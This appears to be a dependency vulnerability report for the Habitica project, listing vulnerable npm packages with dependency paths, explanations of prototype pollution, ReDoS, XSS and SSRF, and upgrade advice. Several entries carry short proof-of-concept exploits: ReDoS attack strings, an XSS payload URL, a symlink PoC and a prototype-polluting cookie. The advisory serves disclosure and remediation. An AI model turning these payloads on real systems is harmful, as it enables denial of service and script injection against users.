Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the unset function in index.js, because it allows access to object prototype properties.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade unset-value to version 2.0.1 or higher.
References
high severity
- Vulnerable module: useragent
- Introduced through: useragent@2.3.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › useragent@2.3.0
Overview
useragent allows you to parse user agent string with high accuracy by using hand tuned dedicated regular expressions for browser matching.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when passing long user-agent strings.
This is due to incomplete fix for this vulnerability: https://snyk.io/vuln/SNYK-JS-USERAGENT-11000.
An attempt to fix the vulnerability has been pushed to master.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
A fix was pushed into the master branch but not yet published.
References
high severity
- Vulnerable module: xml-crypto
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1
Overview
xml-crypto is a xml digital signature and encryption library for Node.js.
Affected versions of this package are vulnerable to Signature Validation Bypass. An attacker can inject an HMAC-SHA1 signature that is valid using only knowledge of the RSA public key. This allows bypassing signature validation.
Remediation
Upgrade xml-crypto to version 2.0.0 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to inserting the X-XSRF-TOKEN header using the secret XSRF-TOKEN cookie value in all requests to any server when the XSRF-TOKEN0 cookie is available, and the withCredentials setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to the XSRF defence mechanism bypass.
Workaround
Users should change the default XSRF-TOKEN cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary.
Remediation
Upgrade axios to version 0.28.0, 1.6.0 or higher.
References
high severity
- Module: eslint-config-habitrpg
- Introduced through: eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3
GPL-3.0 license
high severity
- Module: habitica-markdown
- Introduced through: habitica-markdown@4.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › habitica-markdown@4.1.0
GPL-3.0 license
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the data: URL handler. An attacker can trigger a denial of service by crafting a data: URL with an excessive payload, causing allocation of memory for content decoding before verifying content size limits.
Remediation
Upgrade axios to version 0.30.0, 1.12.0 or higher.
References
medium severity
- Vulnerable module: markdown-it
- Introduced through: habitica-markdown@4.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › habitica-markdown@4.1.0 › markdown-it-linkify-images@3.0.0 › markdown-it@13.0.2
Overview
markdown-it is a modern pluggable markdown parser.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.
PoC
import markdownit from 'markdown-it'
const md = markdownit({linkify: true})
for (var i = 1; i <= 50; i++) {
var time = Date.now();
var attack_str = 'https://test.com?' + '*'.repeat(10000 * i) + 'a';
md.render(attack_str);
var time_cost = Date.now() - time;
console.log(
"attack_str.length: " + attack_str.length + ": " + time_cost + " ms"
);
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade markdown-it to version 14.1.1 or higher.
References
medium severity
- Vulnerable module: useragent
- Introduced through: useragent@2.3.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › useragent@2.3.0
Overview
useragent is an allows you to parse user agent string with high accuracy by using hand tuned dedicated regular expressions for browser matching.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of insecure regular expressions in the regexps.js component.
PoC
var useragent = require('useragent');
var attackString = "HbbTV/1.1.1CE-HTML/1.9;THOM " + new Array(20).join("SW-Version/");
// A copy of the regular expression
var reg = /(HbbTV)\/1\.1\.1.*CE-HTML\/1\.\d;(Vendor\/)*(THOM[^;]*?)[;\s](?:.*SW-Version\/.*)*(LF[^;]+);?/;
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + attackString + '\r\n\r\n';
console.log(useragent.parse(request).device);
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
There is no fixed version for useragent.
References
medium severity
- Vulnerable module: tmp
- Introduced through: useragent@2.3.0 and eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › useragent@2.3.0 › tmp@0.0.33
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › inquirer@7.3.3 › external-editor@3.1.0 › tmp@0.0.33
Overview
Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.
PoC
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
Remediation
Upgrade tmp to version 0.2.4 or higher.
References
medium severity
- Vulnerable module: express-validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1Remediation: Upgrade to express-validator@6.0.0.
Overview
express-validator is an express.js middleware for validator.js.
Affected versions of this package are vulnerable to Filter Bypass. express-validator by default does not sanitize arrays or non-string values. This vulnerability could be leveraged by an attacker to bypass express-validator protections and inject malicious JavaScript into a webpage.
POC
const express = require("express");
const app = express();
const { sanitizeQuery } = require("express-validator/filter");
app.get(
"/",
[sanitizeQuery("id").escape()],
async (req, res) => {
res.send("id is " + req.query.id);
}
);
app.listen(8080, function() {
console.log("server running on 8080");
}); //the server object listens on port 8080
Sending an HTTP request such as http://URL:8080/?id[]=<script>alert('XSS')</script> will result in execution of JavaScript successfully bypassing the module.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade express-validator to version 6.0.0 or higher.
References
medium severity
- Vulnerable module: request
- Introduced through: amazon-payments@0.2.9, gulp.spritesmith@6.13.1 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0
Overview
request is a simplified http request client.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to insufficient checks in the lib/redirect.js file by allowing insecure redirects in the default configuration, via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).
NOTE: request package has been deprecated, so a fix is not expected. See https://github.com/request/request/issues/3142.
Remediation
A fix was pushed into the master branch but not yet published.
References
medium severity
- Vulnerable module: tough-cookie
- Introduced through: amazon-payments@0.2.9, gulp.spritesmith@6.13.1 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2 › tough-cookie@2.5.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0 › tough-cookie@2.4.3
Overview
tough-cookie is a RFC6265 Cookies and CookieJar module for Node.js.
Affected versions of this package are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. Due to an issue with the manner in which the objects are initialized, an attacker can expose or modify a limited amount of property information on those objects. There is no impact to availability.
PoC
// PoC.js
async function main(){
var tough = require("tough-cookie");
var cookiejar = new tough.CookieJar(undefined,{rejectPublicSuffixes:false});
// Exploit cookie
await cookiejar.setCookie(
"Slonser=polluted; Domain=__proto__; Path=/notauth",
"https://__proto__/admin"
);
// normal cookie
var cookie = await cookiejar.setCookie(
"Auth=Lol; Domain=google.com; Path=/notauth",
"https://google.com/"
);
//Exploit cookie
var a = {};
console.log(a["/notauth"]["Slonser"])
}
main();
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
